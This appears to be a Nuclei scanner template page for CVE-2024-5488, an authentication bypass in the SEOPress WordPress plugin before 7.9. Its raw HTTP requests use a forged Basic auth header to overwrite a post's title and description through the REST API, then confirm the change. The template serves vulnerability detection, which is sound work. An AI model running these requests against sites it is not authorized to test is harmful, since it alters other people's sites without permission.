Skip to content
Nuclei Templates

SEOPress < 7.9 - Authentication Bypass

ID: CVE-2024-5488

Severity: critical

Author: pdresearch,iamnoooob,rootxharsh

Tags: cve,cve2024,wp,wordpress,wp-plugin,seopress,auth-bypass

Description

Section titled “Description”

The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.

YAML Source

Section titled “YAML Source”
id: CVE-2024-5488


info:
  name: SEOPress < 7.9 - Authentication Bypass
  author: pdresearch,iamnoooob,rootxharsh
  severity: critical
  description: |
    The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.
  reference:
    - https://wpscan.com/blog/object-injection-vulnerability-fixed-in-seopress-7-9/
    - https://wpscan.com/vulnerability/28507376-ded0-4e1a-b2fc-2182895aa14c/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5488
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-5488
    epss-score: 0.00043
    epss-percentile: 0.09608
  metadata:
    verified: true
    max-request: 3
  tags: cve,cve2024,wp,wordpress,wp-plugin,seopress,auth-bypass


flow: http(1) && http(2) && http(3)


variables:
  marker: "{{randstr}}"
  username: "admin"


http:
  - raw:
      - |
        PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        part: body
        words:
          - 'Sorry, you are not allowed to do that.'
        internal: true


  - raw:
      - |
        PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username+':aaaaaa')}}
        Content-Type: application/x-www-form-urlencoded


        title={{marker}}&description={{marker}}


    matchers:
      - type: word
        part: body
        words:
          - '"code":"success"'
        internal: true


  - raw:
      - |
        GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        part: body
        words:
          - '"title":"{{marker}}","description":"{{marker}}"'
# digest: 490a00463044022014441a862df27db62f282d955bd45a4aede72ee80a8c22a19043cb7b0a0348ff0220104e1a5a55e39836f0daa40e534aff2e9dbc25eeb58094b905dec7265f1bf597:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-5488.yaml"

View on Github